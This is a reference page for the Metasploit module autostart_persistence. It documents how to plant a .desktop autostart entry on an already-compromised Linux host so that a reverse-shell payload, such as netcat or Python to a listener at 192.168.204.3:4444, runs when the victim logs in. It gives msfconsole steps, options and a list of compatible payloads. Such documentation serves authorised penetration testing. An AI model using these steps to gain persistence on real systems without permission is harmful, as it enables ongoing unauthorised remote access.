Autostart Desktop Item Persistence - Metasploit


This page contains detailed information about how to use the exploit/linux/local/autostart_persistence metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Autostart Desktop Item Persistence
Module: exploit/linux/local/autostart_persistence
Source code: modules/exploits/linux/local/autostart_persistence.rb
Disclosure date: 2006-02-13
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Linux, Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module will create an autostart entry to execute a payload. The payload will be executed when the users logs in.

Module Ranking and Traits

Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage

Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/linux/local/autostart_persistence
msf exploit(autostart_persistence) > show targets
    ... a list of targets ...
msf exploit(autostart_persistence) > set TARGET target-id
msf exploit(autostart_persistence) > show options
    ... show and set options ...
msf exploit(autostart_persistence) > set SESSION session-id
msf exploit(autostart_persistence) > exploit

Required Options

  • SESSION: The session to run this module on.

Knowledge Base

Autostart persistence

This module persist a payload by creating a .desktop entry for Linux desktop targets.

Testing

  1. Exploit a box
  2. use exploit/linux/local/autostart_persistence
  3. set SESSION <id>
  4. set PAYLOAD cmd/unix/reverse_python (for instance), configure the payload as needed
  5. exploit

When the victim logs in your payload will be executed!

Options

NAME

Name of the .desktop entry to add, if not specified it will be chosen randomly.

Go back to menu.

Msfconsole Usage

Here is how the linux/local/autostart_persistence exploit module looks in the msfconsole:

msf6 > use exploit/linux/local/autostart_persistence

[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(linux/local/autostart_persistence) > show info

       Name: Autostart Desktop Item Persistence
     Module: exploit/linux/local/autostart_persistence
   Platform: Unix, Linux
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2006-02-13

Provided by:
  Eliott Teissonniere

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  NAME                      no        Name of autostart entry
  SESSION                   yes       The session to run this module on.

Payload information:
  Avoid: 5 characters

Description:
  This module will create an autostart entry to execute a payload. The 
  payload will be executed when the users logs in.

Module Options

This is a complete list of options available in the linux/local/autostart_persistence exploit:

msf6 exploit(linux/local/autostart_persistence) > show options

Module options (exploit/linux/local/autostart_persistence):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   NAME                      no        Name of autostart entry
   SESSION                   yes       The session to run this module on.

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options

Here is a complete list of advanced options supported by the linux/local/autostart_persistence exploit:

msf6 exploit(linux/local/autostart_persistence) > show advanced

Module advanced options (exploit/linux/local/autostart_persistence):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   true             no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                0                no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_netcat):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets

Here is a list of targets (platforms and systems) which the linux/local/autostart_persistence module can exploit:

msf6 exploit(linux/local/autostart_persistence) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic

Compatible Payloads

This is a list of possible payloads which can be delivered and executed on the target system using the linux/local/autostart_persistence exploit:

msf6 exploit(linux/local/autostart_persistence) > show payloads

Compatible Payloads
===================

   #   Name                                 Disclosure Date  Rank    Check  Description
   -   ----                                 ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_netcat                          normal  No     Unix Command Shell, Bind TCP (via netcat)
   1   payload/cmd/unix/bind_perl                            normal  No     Unix Command Shell, Bind TCP (via Perl)
   2   payload/cmd/unix/bind_perl_ipv6                       normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   3   payload/cmd/unix/generic                              normal  No     Unix Command, Generic Command Execution
   4   payload/cmd/unix/pingback_bind                        normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   5   payload/cmd/unix/pingback_reverse                     normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   6   payload/cmd/unix/reverse_netcat                       normal  No     Unix Command Shell, Reverse TCP (via netcat)
   7   payload/cmd/unix/reverse_perl                         normal  No     Unix Command Shell, Reverse TCP (via Perl)
   8   payload/cmd/unix/reverse_perl_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   9   payload/cmd/unix/reverse_python                       normal  No     Unix Command Shell, Reverse TCP (via Python)
   10  payload/cmd/unix/reverse_python_ssl                   normal  No     Unix Command Shell, Reverse TCP SSL (via python)

Evasion Options

Here is the full list of possible evasion options supported by the linux/local/autostart_persistence exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/local/autostart_persistence) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Go back to menu.

See Also

Check also the following modules related to this module:

Authors

  • Eliott Teissonniere

Version

This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.